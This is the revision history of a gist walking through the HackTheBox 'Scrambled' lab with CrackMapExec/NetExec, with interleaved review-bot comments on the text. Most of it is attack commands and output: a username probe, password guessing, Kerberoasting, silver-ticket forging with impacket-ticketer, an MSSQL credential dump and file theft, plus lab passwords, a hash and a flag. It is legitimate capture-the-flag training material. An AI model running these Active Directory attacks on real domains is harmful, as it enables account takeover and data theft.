Revisions
mpgn revised this gist
Dec 20, 2023. 1 changed file with 1 addition and 1 deletion.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -279,4 +279,4 @@ SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Cl For the rest, follow https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html => part ScrambleClient Reverse ! That's all for me, I hope you learn a bit more about NetExec, for latest news follow me on twitter => [@mpgn_x64](https://twitter.com/mpgn_x64) and follow [@0xdf_](https://twitter.com/0xdf_) for the HTB writeup :) -
mpgn revised this gist
Dec 20, 2023. 1 changed file with 1 addition and 1 deletion.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ Scrambled vs NetExec === Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading [Scrambled](https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html) writeup from [0xdf_](https://twitter.com/0xdf_) when I read this: -
mpgn renamed this gist
Dec 20, 2023. 1 changed file with 26 additions and 27 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,18 +1,18 @@ Scrambled vs Crackmapexec === Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading [Scrambled](https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html) writeup from [0xdf_](https://twitter.com/0xdf_) when I read this: > smbclient won’t work, and I wasn’t able to get crackmapexec to work either. To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :) Note: I will pass the web part where we get one username : ksimpson #### 1. Getting domain info ``` netexec ldap 10.10.11.168 LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) ``` 
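Review bot: the heading in hunk @@ -1,18 +1,18 @@ still reads `Scrambled vs Crackmapexec` while the sentence directly under it now says NetExec and NXC; rename the title in the same pass so the document is consistent. One sentence after the step-1 banner would also help: the hostname and domain it reveals (`DC1.scrm.local`, `scrm.local`) are what the `/etc/hosts` entry is for, because every later `-k` command targets `DC1.scrm.local` rather than the IP, and Kerberos service tickets are requested for a name, not an address.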
@@ -24,30 +24,30 @@ We can update our /etc/hosts file #### 2. Check if user ksimpson exist ``` netexec ldap DC1.scrm.local -u ksimpson -p blabla LDAP dc1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP dc1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla STATUS_NOT_SUPPORTED # with kerberos netexec ldap DC1.scrm.local -u ksimpson -p blabla -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP DC1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED ``` KDC_ERR_PREAUTH_FAILED => mean we have a valid username but bad password ! Let's try login = password ;) Also, you may have noticed the **STATUS_NOT_SUPPORTED** without kerberos option, it means NTLM is disabled on the domain, no big deal for NXC ;) #### 3. Checking ksimpson password ``` netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson ``` #### 4. Enumerate shares ``` netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --shares SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares 
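Review bot: the username check in hunk @@ -24,30 +24,30 @@ (`-u ksimpson -p blabla`) is a deliberate failed logon, and a Kerberos pre-authentication failure counts against the account's bad-password counter just as an NTLM failure does, so the text should say that the lockout policy is checked first and that the probe is not something to run in a loop against a list of users. The explanation of `KDC_ERR_PREAUTH_FAILED` is correct; the complementary case is worth adding: a principal that does not exist comes back as `KDC_ERR_C_PRINCIPAL_UNKNOWN`, which is what turns this into a username oracle.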
@@ -69,16 +69,16 @@ User can read "Public" share #### 5. Check files inside Public ``` netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k -M spider_plus SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option: SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['print$'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/nxc_spider_plus cat /tmp/nxc_spider_plus/DC1.scrm.local.json | grep 'Public' -A 6 "Public": { "Network Security Changes.pdf": { "atime_epoch": "2021-11-04 18:23:11", @@ -93,7 +93,7 @@ There is one file: "Network Security Changes.pdf", let's get the file :) #### 6. Getting file "Network Security Changes.pdf" on "Public" share: ``` netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --get-file 'Network Security Changes.pdf' /tmp/Network_Security_Changes.pdf --share "Public" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Network Security Changes.pdf to /tmp/Network_Security_Changes.pdf 
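Review bot: the `DIR`, `EXT` and `SIZE` lines printed by `spider_plus` in hunk @@ -69,16 +69,16 @@ are the module's exclusion and limit settings (excluded shares or directories, excluded extensions, maximum size in bytes for files it will download), not a description of what was found, and the text never says so; one sentence would stop readers from reading `SIZE: 51200` as the reason a 615.34 KB PDF is listed but not fetched. The JSON is a metadata listing, which is also why step 6 in hunk @@ -93,7 +93,7 @@ needs a separate `--get-file`; say that at the transition between the two steps.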
@@ -103,23 +103,23 @@ SMB DC1.scrm.local 445 DC1.scrm.local [+] File Network Security Ch #### 7. Get Kerberoastable users ``` netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k --kerberoasting /tmp/hash LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson LDAPS DC1.scrm.local 636 DC1.scrm.local [*] Total of records returned 2 LDAPS DC1.scrm.local 636 DC1.scrm.local sAMAccountName: sqlsvc memberOf: pwdLastSet: 2021-11-03 12:32:02.351452 lastLogon:2022-11-01 15:06:06.512547 LDAPS DC1.scrm.local 636 DC1.scrm.local $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3b7c5f0a4c366bceb1bb3f7747a898b8$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 # checking creds after cracking with Hashcat netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc ``` #### 8. Trying to connect to MSSQL ``` netexec mssql DC1.scrm.local -u sqlsvc -p Pegasus60 -d scrm.local -k MSSQL DC1.scrm.local 1433 None [*] None (name:DC1.scrm.local) (domain:scrm.local) MSSQL DC1.scrm.local 1433 None [-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc' ``` @@ -129,7 +129,7 @@ User cannot connect to the MSSQL (very strange but i guess it on purpose to expl #### 9. Getting the SID of the domain: ``` netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc LDAPS DC1.scrm.local 636 DC1.scrm.local Domain SID S-1-5-21-2743207045-1827831105-2542523200 
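Review bot: the Kerberoast output in hunk @@ -103,23 +103,23 @@ says `Total of records returned 2` but lists a single account (`sqlsvc`); either show the second record or note that it was trimmed. The `$krb5tgs$23$` prefix tells the reader the ticket is RC4-HMAC (etype 23), i.e. hashcat mode 13100, which is why it cracks so quickly; "cracking with Hashcat" should name the mode. In the step-8 block, `Login failed for user 'SCRM\sqlsvc'` is SQL Server's own login error and it names the Windows identity it authenticated, so the failure is at the SQL login layer, not in Kerberos. That is exactly why the silver ticket in step 10 works, since the forged ticket names a principal that does have a login; spelling this out would replace the "very strange" remark in hunk @@ -129,7 +129,7 @@ with the actual reasoning.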
@@ -157,15 +157,15 @@ Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corpo [*] Saving ticket in administrator.ccache export KRB5CCNAME=administrator.ccache netexec mssql DC1.scrm.local --use-kcache MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) ``` #### 11. Execute MSSQL query ``` netexec mssql DC1.scrm.local --use-kcache --query "SELECT LdapUser,LdapPwd from ScrambleHR.dbo.UserImport;" MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE LdapUser @@ -176,7 +176,7 @@ MSSQL dc1.scrm.local 1433 NONE MiscSvc MSSQL dc1.scrm.local 1433 NONE ScrambledEggs9900 # checking new creds netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 ``` @@ -188,7 +188,7 @@ We got a new user: #### 12. Getting user flag.txt ``` netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\miscsvc\\desktop\\user.txt' /tmp/user.txt MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\miscsvc\\desktop\\user.txt to /tmp/user.txt @@ -198,7 +198,7 @@ MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\miscsvc\ #### 12.bis Getting the root flag using (unatended solution ???) ``` netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\administrator\\desktop\\root.txt' /tmp/root.txt MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt 
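Review bot: the `-nthash b999a16500b87d17ec7f2e2a68778f05` passed to `impacket-ticketer` in hunk @@ -157,15 +157,15 @@ appears from nowhere; the page never shows how it is derived from the cracked password `Pegasus60`. Add the one-line derivation (the NT hash is MD4 over the UTF-16LE encoding of the password) so the silver-ticket step is reproducible, and state why this hash is the right key: `sqlsvc` is the account the MSSQL service runs under, so its key is what a `MSSQLSvc/dc1.scrm.local:1433` service ticket is encrypted with, which lets you forge a ticket for `administrator` without ever asking the KDC. Also note that the SPN host and port must match what the client looks up in the cache (`MSSQLSvc/<target>:<port>` for the host and port NetExec connects to), otherwise `--use-kcache` will not find a usable ticket.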
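Review bot: `unatended` in the step-12.bis heading of hunk @@ -198,7 +198,7 @@ should be `unintended`, and the trailing `???` leaves the reader guessing; say what is meant, namely that the MSSQL `--get-file` read of `c:\users\administrator\desktop\root.txt` already yields the root flag before the ScrambleClient path the closing paragraph points to, and that this is presumably not how the box was meant to be solved.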
@@ -213,7 +213,7 @@ We have the **root flag** but it seems it is not the end so let's go for the fun #### 13. Getting readable shares for user miscsvc ``` netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --shares SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares @@ -233,17 +233,16 @@ SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ #### 14. List file inside IT share ``` SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option: SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['netlogon', 'public', 'sysvol', 'ipc$'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200 SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/nxc_spider_plus ┌──(kali㉿kali)-[~/netexec] └─$ cat /tmp/nxc_spider_plus/DC1.scrm.local.json { "IT": { "Apps/Sales Order Client/ScrambleClient.exe": { 
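Review bot: hunk @@ -233,17 +233,16 @@ shows the step-14 `spider_plus` output but not the command that produced it, and the `DIR: ['netlogon', 'public', 'sysvol', 'ipc$']` line shows the exclusion list was changed from the default used in step 5, so the reader cannot reproduce the listing; add the command line together with the module option used (presumably the module's exclude filter, set to those four names so that only `IT` is spidered). The `┌──(kali㉿kali)-[~/netexec] └─$` prompt residue on the `cat` line should also go, since none of the other blocks show a shell prompt.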
@@ -271,7 +270,7 @@ SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:Scram SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleClient.exe to /tmp/file.exe SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleClient.exe was transferred to /tmp/file.exe netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleLib.dll' /tmp/file.dll --share "IT" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleLib.dll to /tmp/file.dll -
mpgn revised this gist
Nov 9, 2022. 1 changed file with 1 addition and 1 deletion.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -12,7 +12,7 @@ Note: I will pass the web part where we get one username : ksimpson #### 1. Getting domain info ``` crackmapexec ldap 10.10.11.168 LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) ``` -
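Review bot: with `--no-smb` gone again in hunk @@ -12,7 +12,7 @@, a short note that this first step runs without any credentials (no `-u`/`-p`) and only reads the DC's banner would tell readers why nothing needs to be known about the target before step 1, and why the hostname and domain it prints are trusted enough to go into `/etc/hosts`.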
mpgn revised this gist
Nov 9, 2022. 1 changed file with 1 addition and 1 deletion.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -12,7 +12,7 @@ Note: I will pass the web part where we get one username : ksimpson #### 1. Getting domain info ``` crackmapexec ldap 10.10.11.168 --no-smb LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) ``` -
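Review bot: adding `--no-smb` to the step-1 command in hunk @@ -12,7 +12,7 @@ leaves the output block untouched, yet that banner still reports `(signing:True) (SMBv1:False)`, values NetExec/CME obtains over an SMB connection; either re-capture the output with the flag in place or drop the flag so that command and output match.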
mpgn revised this gist
Nov 1, 2022. 1 changed file with 3 additions and 3 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -33,7 +33,7 @@ crackmapexec ldap DC1.scrm.local -u ksimpson -p blabla -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP DC1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED ``` KDC_ERR_PREAUTH_FAILED => mean we have a valid username but bad password ! Let's try login = password ;) Also, you may have noticed the **STATUS_NOT_SUPPORTED** without kerberos option, it means NTLM is disabled on the domain, no big deal for CME ;) #### 3. Checking ksimpson password @@ -203,12 +203,12 @@ MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\administrator\\desktop\\root.txt was transferred to /tmp/root.txt cat /tmp/root.txt 936c171e740f3009a405919f03a05644 ``` We have the **root flag** but it seems it is not the end so let's go for the fun :) #### 13. Getting readable shares for user miscsvc -
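Review bot: in hunk @@ -33,7 +33,7 @@, `KDC_ERR_PREAUTH_FAILED => mean we have` should read `means`, and the `STATUS_NOT_SUPPORTED` sentence generalises from one error code to "NTLM is disabled on the domain"; what the response actually shows is that this DC refuses NTLM authentication for this logon, which is the safer statement, and the practical consequence worth stating is that every subsequent command needs `-k` and an FQDN target.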
mpgn revised this gist
Nov 1, 2022. 1 changed file with 0 additions and 2 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -9,8 +9,6 @@ To be fair, at the time of his writeup it was true, but not anymore and it's pre Note: I will pass the web part where we get one username : ksimpson #### 1. Getting domain info ``` -
mpgn revised this gist
Nov 1, 2022. No changes.
mpgn created this gist
Nov 1, 2022.
@@ -0,0 +1,285 @@ Scrambled vs Crackmapexec === Let pwn the box Scrambled from HackTheBox using only CrackMapExec ! For context, I was reading [Scrambled](https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html) writeup from [0xdf_](https://twitter.com/0xdf_) when I read this: > smbclient won’t work, and I wasn’t able to get crackmapexec to work either. To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with CME, 5 minutes and you get root :) Note: I will pass the web part where we get one username : ksimpson Support: https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html #### 1. Getting domain info ``` crackmapexec ldap 10.10.11.168 LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) ``` - Target: DC1.scrm.local - Domain: scrm.local We can update our /etc/hosts file #### 2. Check if user ksimpson exist ``` crackmapexec ldap DC1.scrm.local -u ksimpson -p blabla LDAP dc1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP dc1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla STATUS_NOT_SUPPORTED # with kerberos crackmapexec ldap DC1.scrm.local -u ksimpson -p blabla -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAP DC1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED ``` KDC_ERR_PREAUTH_FAILED => mean we have a valid username but bad password ! Let's try login = password Also, you may have noticed the **STATUS_NOT_SUPPORTED** without kerberos option, it means NTLM is disabled on the domain, no big deal for CME ;) #### 3. 
Checking ksimpson password ``` crackmapexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson ``` #### 4. Enumerate shares ``` crackmapexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --shares SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares SMB DC1.scrm.local 445 DC1.scrm.local Share Permissions Remark SMB DC1.scrm.local 445 DC1.scrm.local ----- ----------- ------ SMB DC1.scrm.local 445 DC1.scrm.local ADMIN$ Remote Admin SMB DC1.scrm.local 445 DC1.scrm.local C$ Default share SMB DC1.scrm.local 445 DC1.scrm.local HR SMB DC1.scrm.local 445 DC1.scrm.local IPC$ READ Remote IPC SMB DC1.scrm.local 445 DC1.scrm.local IT SMB DC1.scrm.local 445 DC1.scrm.local NETLOGON READ Logon server share SMB DC1.scrm.local 445 DC1.scrm.local Public READ SMB DC1.scrm.local 445 DC1.scrm.local Sales SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ Logon server share ``` User can read "Public" share #### 5. Check files inside Public ``` crackmapexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k -M spider_plus SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option: SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['print$'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk'] SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200 SPIDER_P... 
DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/cme_spider_plus cat /tmp/cme_spider_plus/DC1.scrm.local.json | grep 'Public' -A 6 "Public": { "Network Security Changes.pdf": { "atime_epoch": "2021-11-04 18:23:11", "ctime_epoch": "2021-11-04 18:20:49", "mtime_epoch": "2021-11-05 13:45:07", "size": "615.34 KB" } ``` There is one file: "Network Security Changes.pdf", let's get the file :) #### 6. Getting file "Network Security Changes.pdf" on "Public" share: ``` crackmapexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --get-file 'Network Security Changes.pdf' /tmp/Network_Security_Changes.pdf --share "Public" SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Network Security Changes.pdf to /tmp/Network_Security_Changes.pdf SMB DC1.scrm.local 445 DC1.scrm.local [+] File Network Security Changes.pdf was transferred to /tmp/Network_Security_Changes.pdf ``` #### 7. 
Get Kerberoastable users ``` crackmapexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k --kerberoasting /tmp/hash LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson LDAPS DC1.scrm.local 636 DC1.scrm.local [*] Total of records returned 2 LDAPS DC1.scrm.local 636 DC1.scrm.local sAMAccountName: sqlsvc memberOf: pwdLastSet: 2021-11-03 12:32:02.351452 lastLogon:2022-11-01 15:06:06.512547 LDAPS DC1.scrm.local 636 DC1.scrm.local $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3b7c5f0a4c366bceb1bb3f7747a898b8$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 # checking creds after cracking with Hashcat crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc ``` #### 8. Trying to connect to MSSQL ``` crackmapexec mssql DC1.scrm.local -u sqlsvc -p Pegasus60 -d scrm.local -k MSSQL DC1.scrm.local 1433 None [*] None (name:DC1.scrm.local) (domain:scrm.local) MSSQL DC1.scrm.local 1433 None [-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc' ``` User cannot connect to the MSSQL (very strange but i guess it on purpose to exploit a [Kerberos Silver Tickets](https://adsecurity.org/?p=2011) which is very cool ! #### 9. Getting the SID of the domain: ``` crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc LDAPS DC1.scrm.local 636 DC1.scrm.local Domain SID S-1-5-21-2743207045-1827831105-2542523200 ``` Notice the automatic switch between **LDAP** and **LDAPS** ! :D #### 10. 
We generate a ticket and use it with option `--use-kcache` ``` impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for scrm.local/administrator [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncTGSRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncTGSRepPart [*] Saving ticket in administrator.ccache export KRB5CCNAME=administrator.ccache crackmapexec mssql DC1.scrm.local --use-kcache MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) ``` #### 11. Execute MSSQL query ``` crackmapexec mssql DC1.scrm.local --use-kcache --query "SELECT LdapUser,LdapPwd from ScrambleHR.dbo.UserImport;" MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE LdapUser MSSQL dc1.scrm.local 1433 NONE LdapPwd MSSQL dc1.scrm.local 1433 NONE -------------------------------------------------- MSSQL dc1.scrm.local 1433 NONE -------------------------------------------------- MSSQL dc1.scrm.local 1433 NONE MiscSvc MSSQL dc1.scrm.local 1433 NONE ScrambledEggs9900 # checking new creds crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False) SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900 ``` We got a new user: * User: MiscSvc * Password: ScrambledEggs9900 #### 12. 
Getting user flag.txt ``` crackmapexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\miscsvc\\desktop\\user.txt' /tmp/user.txt MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\miscsvc\\desktop\\user.txt to /tmp/user.txt MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\miscsvc\\desktop\\user.txt was transferred to /tmp/user.txt ``` #### 12.bis Getting the root flag using (unatended solution ???) ``` crackmapexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\administrator\\desktop\\root.txt' /tmp/root.txt MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:) MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!) MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\administrator\\desktop\\root.txt was transferred to /tmp/root.txt cat /tmp/root.txt 936c171e740f3009a405919f03a05644 ``` We 